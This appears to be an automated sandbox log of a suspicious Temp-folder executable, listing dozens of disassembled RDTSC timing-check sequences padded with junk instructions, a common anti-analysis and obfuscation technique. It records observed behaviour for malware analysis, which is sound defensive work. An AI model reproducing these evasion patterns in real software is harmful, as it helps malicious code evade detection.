Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1168E15 second address: 1168E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e js 00007F3FE11BFDC6h 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 1169034 second address: 116903E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3FE0C24E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 11692B3 second address: 11692C0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 11692C0 second address: 11692D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 11692D6 second address: 11692DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 11692DA second address: 1169309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 mov ecx, dword ptr [ebp+122D38DFh] 0x0000000f push esi 0x00000010 mov ecx, dword ptr [ebp+1244A18Ch] 0x00000016 pop ebx 0x00000017 popad 0x00000018 push dword ptr [ebp+122D18A1h] 0x0000001e movzx edx, dx 0x00000021 push 82CAEDB3h 0x00000026 jbe 00007F3FE0C24E5Eh 0x0000002c push esi 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 116ACC3 second address: 116ACD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 116ACD5 second address: 116ACE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 116C8D5 second address: 116C8DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F3FE11BFDC6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5820133 second address: 582016E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bl, cl 0x0000000d mov dh, C5h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 mov si, bx 0x00000015 mov si, di 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F3FE0C24E61h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 582016E second address: 5820172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5820172 second address: 5820178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5820178 second address: 582017E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 582017E second address: 5820182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5820182 second address: 5820186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800E85 second address: 5800E89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800E89 second address: 5800E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800E8F second address: 5800E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE0C24E5Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800E9F second address: 5800EBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3FE11BFDD3h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800EBE second address: 5800EF8 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 43C1186Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, esi 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F3FE0C24E66h 0x00000017 sbb cx, F3C8h 0x0000001c jmp 00007F3FE0C24E5Bh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5850129 second address: 5850166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push ebp 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F3FE11BFDCAh 0x0000000e or si, 3168h 0x00000013 jmp 00007F3FE11BFDCBh 0x00000018 popfd 0x00000019 mov edi, esi 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F3FE11BFDD1h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5850166 second address: 58501B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3FE0C24E67h 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F3FE0C24E60h 0x00000015 jmp 00007F3FE0C24E65h 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d mov si, 4F5Dh 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58501B4 second address: 58501CE instructions: 0x00000000 rdtsc 0x00000002 mov dh, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3FE11BFDD0h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E00F4 second address: 57E00F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E00F8 second address: 57E0110 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0110 second address: 57E01AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3FE0C24E66h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F3FE0C24E5Eh 0x00000018 sbb ecx, 757558F8h 0x0000001e jmp 00007F3FE0C24E5Bh 0x00000023 popfd 0x00000024 push esi 0x00000025 mov edx, 1030731Ah 0x0000002a pop edi 0x0000002b popad 0x0000002c push dword ptr [ebp+04h] 0x0000002f pushad 0x00000030 movzx ecx, di 0x00000033 pushfd 0x00000034 jmp 00007F3FE0C24E69h 0x00000039 jmp 00007F3FE0C24E5Bh 0x0000003e popfd 0x0000003f popad 0x00000040 push dword ptr [ebp+0Ch] 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F3FE0C24E65h 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E01AA second address: 57E01BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE11BFDCCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E01BA second address: 57E01E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3FE0C24E69h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E01E2 second address: 57E01E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E01E6 second address: 57E01EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 57E0220 second address: 57E0226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800C21 second address: 5800C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800C25 second address: 5800C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800C2B second address: 5800C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F3FE0C24E67h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 580080D second address: 5800811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800811 second address: 5800817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800817 second address: 580081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 580081D second address: 5800821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800821 second address: 580085E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov si, 271Dh 0x00000012 pushfd 0x00000013 jmp 00007F3FE11BFDCAh 0x00000018 adc ch, 00000078h 0x0000001b jmp 00007F3FE11BFDCBh 0x00000020 popfd 0x00000021 popad 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 580085E second address: 5800862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800862 second address: 580087D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 580074E second address: 5800762 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE0C24E60h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800762 second address: 5800766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800766 second address: 580077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3FE0C24E5Ah 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800483 second address: 5800487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800487 second address: 580048D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 580048D second address: 58004AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE11BFDD9h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58004AA second address: 58004AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58004AE second address: 58004D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3FE11BFDD8h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5810216 second address: 581021C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 581021C second address: 5810220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5850008 second address: 585000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 585000C second address: 5850010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5850010 second address: 5850016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5850016 second address: 585001D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 9Dh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 585001D second address: 585009A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebp 0x00000008 pushad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F3FE0C24E64h 0x00000010 sub eax, 1D795BF8h 0x00000016 jmp 00007F3FE0C24E5Bh 0x0000001b popfd 0x0000001c mov di, cx 0x0000001f popad 0x00000020 call 00007F3FE0C24E64h 0x00000025 pushfd 0x00000026 jmp 00007F3FE0C24E62h 0x0000002b adc ch, FFFFFF88h 0x0000002e jmp 00007F3FE0C24E5Bh 0x00000033 popfd 0x00000034 pop esi 0x00000035 popad 0x00000036 mov dword ptr [esp], ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c mov cx, 89F7h 0x00000040 mov ecx, 3347CE93h 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 585009A second address: 58500B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE11BFDD4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 580063D second address: 5800661 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5800661 second address: 580067B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5820032 second address: 582004E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3FE0C24E68h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 582004E second address: 582005D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 582005D second address: 5820063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58202A2 second address: 58202BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58202BF second address: 58202C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58202C5 second address: 58202C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58202C9 second address: 582030E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F3FE0C24E69h 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov bl, ch 0x00000015 mov si, dx 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov cl, 9Eh 0x00000020 mov cl, bl 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 582030E second address: 5820314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5820314 second address: 5820318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58407C3 second address: 58407E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58407E6 second address: 58407ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 58407ED second address: 5840816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [775165FCh] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3FE11BFDCAh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5840816 second address: 5840825 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5840825 second address: 584085B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3FE11BFDCFh 0x00000008 pop ecx 0x00000009 mov ch, dl 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test eax, eax 0x00000010 jmp 00007F3FE11BFDD0h 0x00000015 je 00007F4052E12EDDh 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 584085B second address: 5840878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE0C24E69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempX13MORRY4SOUQ09KCVKOJT9CC7FOTEVT.EXE	RDTSC instruction interceptor: First address: 5840878 second address: 58408C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FE11BFDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F3FE11BFDCCh 0x00000012 sbb al, 00000028h 0x00000015 jmp 00007F3FE11BFDCBh 0x0000001a popfd 0x0000001b popad 0x0000001c xor eax, dword ptr [ebp+08h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F3FE11BFDD1h 0x00000026 rdtsc
